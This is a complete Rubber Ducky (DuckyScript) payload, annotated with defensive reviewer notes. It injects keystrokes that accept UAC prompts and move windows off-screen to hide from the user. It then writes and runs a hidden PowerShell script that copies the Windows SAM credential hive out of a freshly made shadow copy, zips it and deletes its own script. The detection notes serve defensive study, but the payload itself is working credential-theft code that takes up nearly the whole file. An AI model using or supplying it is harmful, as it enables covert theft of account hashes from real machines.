REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
|
|
REM Description: Extracts Security Account Manager of the PC to a file.
|
|
REM Version: 1.0
|
|
REM Category: Exfiltration
|
|
REM --- Reviewer notes (defensive reading of the payload) ---
REM Overview: a keystroke-injection sequence. It opens an elevated Notepad, types a PowerShell
REM script into it, saves that script under C:\Windows, then opens an elevated cmd and runs the
REM script hidden. The script copies the SAM hive out of a freshly created Volume Shadow Copy.
REM Preconditions visible below: an unlocked interactive session, and a UAC consent prompt that can
REM be accepted by keystroke (ALT y). Requiring credentials at the UAC prompt (or a locked screen)
REM breaks the flow. At the point of entry, HID/USB device control is the relevant mitigation, since
REM DuckyScript payloads are delivered by a device enumerating as a keyboard.
DELAY 750
|
|
GUI r
|
|
DELAY 1000
|
|
REM Stage 1: elevated Notepad via Start-Process -Verb runAs. The ALT y below presumably answers the
REM UAC consent dialog. Detection: powershell.exe launched from the Run box spawning an elevated
REM notepad.exe is an unusual parent/child pair.
STRING powershell Start-Process notepad -Verb runAs
|
|
ENTER
|
|
DELAY 750
|
|
ALT y
|
|
DELAY 750
|
|
ENTER
|
|
REM ALT SPACE, m, then 100x DOWNARROW appears to use the window menu's Move command to push the
REM Notepad window off-screen so the script being typed is not visible to the user.
ALT SPACE
|
|
DELAY 1000
|
|
STRING m
|
|
DELAY 1000
|
|
DOWNARROW
|
|
REPEAT 100
|
|
ENTER
|
|
REM Stage 2: the PowerShell script body, typed one line per STRING/ENTER pair.
REM Staging folder 'Ducky Report <timestamp>' is created under the user profile; it is removed near
REM the end of the script, but other artifacts written below are not (see notes on Report.zip and
REM the shadow copy).
STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss')
|
|
ENTER
|
|
STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime
|
|
ENTER
|
|
STRING $fileSaveDir = New-Item ($userDir) -ItemType Directory
|
|
ENTER
|
|
STRING $date = get-date
|
|
ENTER
|
|
REM HTML report scaffolding (ConvertTo-Html) written as ComputerInfo.html into the staging folder.
STRING $style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>"
|
|
ENTER
|
|
STRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html'
|
|
ENTER
|
|
STRING $Report = $Report + "<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>"
|
|
ENTER
|
|
REM Core technique: create a Volume Shadow Copy of C: through WMI (Win32_ShadowCopy.Create), look it
REM up by ShadowID, and expose its DeviceObject through a directory symlink so the normally locked
REM SAM hive can be read from the snapshot. Detection points: Win32_ShadowCopy.Create invoked from
REM powershell.exe; cmd.exe /c mklink targeting a \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN
REM path; and a Copy-Item whose source ends in \Windows\System32\config\SAM. Script block logging
REM (Microsoft-Windows-PowerShell/Operational, event 4104) records all of these lines.
STRING $createShadow = (gwmi -List Win32_ShadowCopy).Create('C:\', 'ClientAccessible')
|
|
ENTER
|
|
STRING $shadow = gwmi Win32_ShadowCopy | ? { $_.ID -eq $createShadow.ShadowID }
|
|
ENTER
|
|
STRING $addSlash = $shadow.DeviceObject + '\'
|
|
ENTER
|
|
STRING cmd /c mklink C:\shadowcopy $addSlash
|
|
ENTER
|
|
STRING Copy-Item 'C:\shadowcopy\Windows\System32\config\SAM' $fileSaveDir
|
|
ENTER
|
|
REM Only the C:\shadowcopy symlink is removed here. Nothing in this sequence deletes the shadow copy
REM itself, so the snapshot created above remains enumerable afterwards (forensic artifact).
STRING Remove-Item -recurse -force 'C:\shadowcopy'
|
|
ENTER
|
|
STRING $Report >> $fileSaveDir'/ComputerInfo.html'
|
|
ENTER
|
|
REM copy-ToZip: packs the staging folder into C:\Windows\Report.zip using the shell.application COM
REM object (CopyHere), polling until each item appears. Report.zip is never removed by this payload;
REM a .zip appearing directly under C:\Windows is another on-disk indicator.
STRING function copy-ToZip($fileSaveDir){
|
|
ENTER
|
|
STRING $srcdir = $fileSaveDir
|
|
ENTER
|
|
STRING $zipFile = 'C:\Windows\Report.zip'
|
|
ENTER
|
|
STRING if(-not (test-path($zipFile))) {
|
|
ENTER
|
|
REM Writes a minimal empty-zip header ("PK" + end-of-central-directory record) so the COM
REM NameSpace call below accepts the file as an archive.
STRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18))
|
|
ENTER
|
|
STRING (dir $zipFile).IsReadOnly = $false}
|
|
ENTER
|
|
STRING $shellApplication = new-object -com shell.application
|
|
ENTER
|
|
STRING $zipPackage = $shellApplication.NameSpace($zipFile)
|
|
ENTER
|
|
STRING $files = Get-ChildItem -Path $srcdir
|
|
ENTER
|
|
STRING foreach($file in $files) {
|
|
ENTER
|
|
STRING $zipPackage.CopyHere($file.FullName)
|
|
ENTER
|
|
STRING while($zipPackage.Items().Item($file.name) -eq $null){
|
|
ENTER
|
|
STRING Start-sleep -seconds 1 }}}
|
|
ENTER
|
|
STRING copy-ToZip($fileSaveDir)
|
|
ENTER
|
|
REM Cleanup attempt: the staging folder is deleted and the script tries to delete its own file via
REM $MyInvocation.InvocationName. Anti-forensics of this kind is itself worth alerting on
REM (a PowerShell script removing its own path).
STRING remove-item $fileSaveDir -recurse
|
|
ENTER
|
|
STRING Remove-Item $MyINvocation.InvocationName
|
|
ENTER
|
|
REM Stage 3: save the typed script as C:\Windows\config-98437.ps1 (possible because Notepad is
REM elevated). Detection: notepad.exe creating a .ps1 under C:\Windows.
CTRL s
|
|
DELAY 750
|
|
STRING C:\Windows\config-98437.ps1
|
|
ENTER
|
|
DELAY 1000
|
|
ALT F4
|
|
DELAY 750
|
|
REM Stage 4: elevated cmd (second UAC prompt, again answered with ALT y), shrunk to 14x1 with
REM 'mode con' and moved off-screen with the same window-menu trick as above.
GUI r
|
|
DELAY 500
|
|
STRING powershell Start-Process cmd -Verb runAs
|
|
ENTER
|
|
DELAY 1000
|
|
ALT y
|
|
DELAY 750
|
|
STRING mode con:cols=14 lines=1
|
|
ENTER
|
|
ALT SPACE
|
|
DELAY 750
|
|
STRING m
|
|
DELAY 1000
|
|
DOWNARROW
|
|
REPEAT 100
|
|
ENTER
|
|
REM Execution policy is loosened for the current user before running the file. Execution policy is
REM not a security boundary; application control (AppLocker/WDAC) and Constrained Language Mode are
REM the controls that would actually block this step. Set-ExecutionPolicy Unrestricted on the
REM command line is a common detection rule.
STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false
|
|
ENTER
|
|
DELAY 750
|
|
REM Final step: the saved script is run with a hidden window from an elevated cmd. Indicators:
REM powershell.exe with -windowstyle hidden and -File pointing at a .ps1 directly under C:\Windows,
REM parented by an elevated cmd.exe.
STRING powershell.exe -windowstyle hidden -File C:\Windows\config-98437.ps1
|
|
ENTER
|